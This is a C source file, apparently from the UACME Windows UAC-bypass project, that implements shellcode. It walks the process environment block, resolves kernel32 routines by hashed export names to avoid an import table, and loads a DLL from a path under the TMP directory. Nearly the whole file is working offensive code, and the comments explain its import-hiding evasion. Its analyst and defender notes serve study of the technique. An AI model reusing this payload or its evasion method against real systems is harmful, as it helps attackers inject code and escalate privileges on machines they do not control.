mirror of https://github.com/hfiref0x/UACME.git
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2015
*
*  TITLE:       MAIN.C
*
*  VERSION:     1.90
*
*  DATE:        16 Sept 2015
*
*  ShellCode.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
// Disable warnings that are not meaningful for this build.
#pragma warning(disable: 4005) // macro redefinition
#include <Windows.h>
#include "..\Shared\ntos.h"
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
#pragma comment(lib, "vcruntimed.lib")
#pragma comment(lib, "ucrtd.lib")
#else
#pragma comment(lib, "libvcruntime.lib")
#endif
#endif
typedef HMODULE(WINAPI *pfnLoadLibraryA)(LPCSTR lpLibFileName);
typedef DWORD(WINAPI *pfnExpandEnvironmentStringsA)(LPCSTR lpSrc, LPSTR lpDst, DWORD nSize);
/*
 * gethash
 *
 * Purpose:
 *
 * Fold a NUL-terminated export name into a 32-bit value so that exports can be
 * looked up by hash instead of by name (see rawGetProcAddress).
 *
 * Each byte is XORed into the accumulator, which is then rotated left by 3 bits
 * and incremented. The empty string hashes to 0.
 *
 * Parameters:
 *   s - NUL-terminated string; must not be NULL.
 *
 * Return: the 32-bit hash of s.
 *
 * Note: *s is a plain char, so on compilers where char is signed a byte >= 0x80
 * is sign-extended before the XOR. Export names are ASCII, so this has no
 * effect on the values used here.
 */
DWORD gethash(char *s)
{
    DWORD acc = 0;
    char *p;

    for (p = s; *p != '\0'; ++p) {
        acc ^= *p;
        acc = RotateLeft32(acc, 3) + 1;
    }

    return acc;
}
/*
 * rawGetProcAddress
 *
 * Purpose:
 *
 * Resolve an export of an already-mapped image by the gethash() value of its
 * name, reading the PE export directory directly instead of calling
 * GetProcAddress.
 *
 * Parameters:
 *   Module - base address of a mapped PE image (its IMAGE_DOS_HEADER).
 *   hash   - gethash() of the wanted export name.
 *
 * Return: address of the first export whose name hashes to 'hash', or NULL if
 * no name matches.
 *
 * Nothing is validated: there is no MZ/PE signature check, no check that an
 * export directory exists, and no bounds on the table indices. A Module that is
 * not a well-formed PE image is read out of bounds.
 *
 * For analysts: hash-based lookup over the raw export directory is how
 * position-independent code avoids an import table; the hash constants passed
 * in by callers are the static artefact left behind.
 */
PVOID rawGetProcAddress(PVOID Module, DWORD hash)
{
    PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Module;
    /* e_lfanew points at the 4-byte PE signature; sizeof(DWORD) steps over it to the file header. */
    PIMAGE_FILE_HEADER fileh = (PIMAGE_FILE_HEADER)((PBYTE)dosh + sizeof(DWORD) + dosh->e_lfanew);
    /* The optional header immediately follows the fixed-size file header. */
    PIMAGE_OPTIONAL_HEADER popth = (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
    DWORD ETableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    /* Everything below is an RVA relative to the image base (dosh). */
    PIMAGE_EXPORT_DIRECTORY pexp = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosh + ETableVA);
    PDWORD names = (PDWORD)((PBYTE)dosh + pexp->AddressOfNames), functions = (PDWORD)((PBYTE)dosh + pexp->AddressOfFunctions);
    PWORD ordinals = (PWORD)((PBYTE)dosh + pexp->AddressOfNameOrdinals);
    DWORD_PTR c, fp;

    /* Linear scan of the name table; names[c] and ordinals[c] are parallel arrays. */
    for (c = 0; c < pexp->NumberOfNames; c++) {
        if (gethash((char *)((PBYTE)dosh + names[c])) == hash) {
            /* The name's ordinal indexes the address table; the entry is an RVA. */
            fp = functions[ordinals[c]];
            return (PBYTE)Module + fp;
        }
    }

    return NULL;
}
/*
 * main
 *
 * Purpose:
 *
 * Shellcode entry point (no CRT, hence the nonstandard 'void main()'). Walks
 * from the TEB to the PEB loader list, resolves two routines from the third
 * module in load order by name hash, expands an environment-variable path and
 * loads the DLL found there.
 *
 * Observable behaviour for defenders: a LoadLibraryA of a DLL under the TMP
 * directory from code that imports nothing - the PEB walk and hashed lookups
 * are what keep the kernel32 routine names out of the binary.
 *
 * x86 (32-bit) only: __readfsdword reads the FS-based TEB and there is no x64
 * branch in this file.
 */
void main()
{
    /* FS:[0x18] holds the TEB self pointer (NT_TIB.Self) on 32-bit Windows. */
    PTEB teb = (PTEB)__readfsdword(0x18);
    PPEB peb = teb->ProcessEnvironmentBlock;
    /* First entry of the loader's in-load-order module list. */
    PLDR_DATA_TABLE_ENTRY ldre0 = (PLDR_DATA_TABLE_ENTRY)peb->Ldr->InLoadOrderModuleList.Flink;
    pfnLoadLibraryA xLoadLibraryA;
    pfnExpandEnvironmentStringsA xExpandEnvironmentStringsA;
    CHAR libpath[MAX_PATH], c; /* c doubles as the loop counter below */
    /*
     * Path template stored as multi-character constants so that no string
     * literal appears in the binary. With MSVC packing on little-endian x86
     * the bytes presumably read "%TMP%\r3" followed by the terminating zero -
     * confirm against the compiled image rather than this comment.
     */
    DWORD textbuf[3] = {
        'PMT%', '3r\\%', 0
    };

    /*
     * Advance two links: the third module in load order, assumed to be the one
     * exporting the two routines resolved below. Nothing verifies that
     * assumption; a mismatch makes the lookups return NULL.
     */
    for (c = 0; c < 2; c++)
        ldre0 = (PLDR_DATA_TABLE_ENTRY)ldre0->InLoadOrderLinks.Flink;

    /*
     * Presumably gethash() of the two routine names the typedefs are named
     * after. The results are used unchecked, so a NULL faults at the call.
     */
    xExpandEnvironmentStringsA = (pfnExpandEnvironmentStringsA)rawGetProcAddress(ldre0->DllBase, 0xf53890a2);
    xLoadLibraryA = (pfnLoadLibraryA)rawGetProcAddress(ldre0->DllBase, 0x69b37e08);

    /* Expand the template into libpath (MAX_PATH bytes) and load whatever DLL sits there. */
    xExpandEnvironmentStringsA((char *)&textbuf, libpath, sizeof(libpath));
    xLoadLibraryA(libpath);
}